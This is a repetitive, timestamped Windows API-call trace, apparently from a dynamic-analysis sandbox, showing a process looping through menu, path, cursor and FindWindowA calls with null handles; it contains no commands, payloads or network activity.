[0027.450] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.450] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.450] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.450] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.450] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.450] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.450] GetStockObject (i=6) returned 0x1b00018 [0027.450] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.450] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.450] PathFileExistsW (pszPath=0x0) returned 0 [0027.450] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.450] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.450] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.450] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.450] GetMenu (hWnd=0x0) returned 0x0 [0027.450] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x372) returned -1 [0027.450] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.450] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.450] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.450] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.450] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.451] GetStockObject (i=6) returned 0x1b00018 [0027.451] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.451] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.451] PathFileExistsW (pszPath=0x0) returned 0 [0027.451] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.451] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.451] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.451] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.451] GetMenu (hWnd=0x0) returned 0x0 [0027.451] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.451] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.451] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.451] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.451] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.451] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.451] GetStockObject (i=6) returned 0x1b00018 [0027.451] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.451] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.451] PathFileExistsW (pszPath=0x0) returned 0 [0027.451] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.451] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.451] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.451] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.451] GetMenu (hWnd=0x0) returned 0x0 [0027.451] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.451] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.451] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.451] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.451] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.451] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.451] GetStockObject (i=6) returned 0x1b00018 [0027.451] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.451] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.451] PathFileExistsW (pszPath=0x0) returned 0 [0027.452] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.452] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.452] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.452] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.452] GetMenu (hWnd=0x0) returned 0x0 [0027.452] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.452] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.452] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.452] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.452] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.452] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.452] GetStockObject (i=6) returned 0x1b00018 [0027.452] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.452] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.452] PathFileExistsW (pszPath=0x0) returned 0 [0027.452] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.452] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.452] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.452] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.452] GetMenu (hWnd=0x0) returned 0x0 [0027.452] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.452] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.452] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.452] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.452] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.452] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.452] GetStockObject (i=6) returned 0x1b00018 [0027.452] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.452] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.452] PathFileExistsW (pszPath=0x0) returned 0 [0027.452] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.452] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.453] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.453] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.453] GetMenu (hWnd=0x0) returned 0x0 [0027.453] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x245) returned -1 [0027.453] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.453] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.453] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.453] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.453] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.453] GetStockObject (i=6) returned 0x1b00018 [0027.453] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.453] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.453] PathFileExistsW (pszPath=0x0) returned 0 [0027.453] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.453] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.453] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.453] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.453] GetMenu (hWnd=0x0) returned 0x0 [0027.453] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.453] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.453] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.453] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.453] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.453] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.453] GetStockObject (i=6) returned 0x1b00018 [0027.453] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.453] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.453] PathFileExistsW (pszPath=0x0) returned 0 [0027.453] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.453] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.453] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.453] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.453] GetMenu (hWnd=0x0) returned 0x0 [0027.453] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.454] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.454] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.454] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.454] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.454] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.454] GetStockObject (i=6) returned 0x1b00018 [0027.454] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.454] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.454] PathFileExistsW (pszPath=0x0) returned 0 [0027.454] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.454] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.454] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.454] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.454] GetMenu (hWnd=0x0) returned 0x0 [0027.454] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.454] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.454] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.454] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.454] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.454] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.454] GetStockObject (i=6) returned 0x1b00018 [0027.454] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.454] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.454] PathFileExistsW (pszPath=0x0) returned 0 [0027.454] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.454] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.454] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.454] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.454] GetMenu (hWnd=0x0) returned 0x0 [0027.454] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.454] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.454] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.454] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.454] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.455] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.455] GetStockObject (i=6) returned 0x1b00018 [0027.455] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.455] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.455] PathFileExistsW (pszPath=0x0) returned 0 [0027.455] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.455] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.455] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.455] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.455] GetMenu (hWnd=0x0) returned 0x0 [0027.455] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x145) returned -1 [0027.455] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.455] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.455] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.455] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.455] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.455] GetStockObject (i=6) returned 0x1b00018 [0027.455] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.455] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.455] PathFileExistsW (pszPath=0x0) returned 0 [0027.455] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.455] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.455] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.455] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.455] GetMenu (hWnd=0x0) returned 0x0 [0027.455] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.455] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.455] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.455] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.455] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.455] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.455] GetStockObject (i=6) returned 0x1b00018 [0027.456] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.456] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.456] PathFileExistsW (pszPath=0x0) returned 0 [0027.456] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.456] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.456] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.456] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.456] GetMenu (hWnd=0x0) returned 0x0 [0027.456] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.456] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.456] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.456] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.456] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.456] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.456] GetStockObject (i=6) returned 0x1b00018 [0027.456] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.456] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.456] PathFileExistsW (pszPath=0x0) returned 0 [0027.456] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.456] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.456] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.456] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.456] GetMenu (hWnd=0x0) returned 0x0 [0027.456] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.456] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.456] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.456] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.456] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.456] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.456] GetStockObject (i=6) returned 0x1b00018 [0027.456] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.456] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.456] PathFileExistsW (pszPath=0x0) returned 0 [0027.456] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.457] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.457] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.457] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.457] GetMenu (hWnd=0x0) returned 0x0 [0027.457] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.457] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.457] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.457] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.457] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.457] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.457] GetStockObject (i=6) returned 0x1b00018 [0027.457] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.457] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.457] PathFileExistsW (pszPath=0x0) returned 0 [0027.457] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.457] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.457] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.457] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.457] GetMenu (hWnd=0x0) returned 0x0 [0027.457] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4b8) returned -1 [0027.457] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.457] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.457] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.457] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.457] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.457] GetStockObject (i=6) returned 0x1b00018 [0027.457] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.457] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.457] PathFileExistsW (pszPath=0x0) returned 0 [0027.457] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.457] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.457] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.458] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.458] GetMenu (hWnd=0x0) returned 0x0 [0027.458] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.458] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.458] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.458] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.458] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.458] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.458] GetStockObject (i=6) returned 0x1b00018 [0027.458] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.458] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.458] PathFileExistsW (pszPath=0x0) returned 0 [0027.458] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.458] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.458] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.458] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.458] GetMenu (hWnd=0x0) returned 0x0 [0027.458] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.458] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.458] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.458] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.458] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.458] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.458] GetStockObject (i=6) returned 0x1b00018 [0027.458] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.458] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.458] PathFileExistsW (pszPath=0x0) returned 0 [0027.458] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.458] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.458] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.458] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.458] GetMenu (hWnd=0x0) returned 0x0 [0027.458] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.458] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.459] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.459] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.459] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.459] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.459] GetStockObject (i=6) returned 0x1b00018 [0027.459] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.459] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.459] PathFileExistsW (pszPath=0x0) returned 0 [0027.459] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.459] GetCursorPos (in: lpPoint=0x18f5e4 | out: 